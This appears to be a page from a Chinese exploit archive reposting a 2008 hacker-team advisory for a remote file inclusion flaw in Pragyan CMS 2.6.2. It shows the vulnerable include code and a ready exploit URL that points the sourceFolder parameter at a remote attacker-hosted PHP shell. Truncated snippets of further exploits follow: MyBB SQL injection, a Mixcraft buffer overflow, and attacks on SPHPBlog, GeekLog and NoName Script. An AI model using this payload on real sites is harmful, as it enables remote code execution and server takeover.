Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
所属分类:
网络安全 / Exploit
阅读数:
96
收藏 0赞 0分享
<< In The Name Of GOD >>
-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008
-
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Includion
- download :http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
[www.Persian-Boys.com] & [www.irchatan.com]
--------------------------------------------------------------
if register_globals = On;
Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################
Exploit :
##########################################################
#
# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?
#
##########################################################
MyBulletinBoard (MyBB)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0赞 0分享
Acoustica Mixcraft
#!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
收藏 0赞 0分享
Simple PHP Blog (SPHPBlog)
<?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
收藏 0赞 0分享
GeekLog
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
收藏 0赞 0分享
NoName Script
################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0赞 0分享
查看更多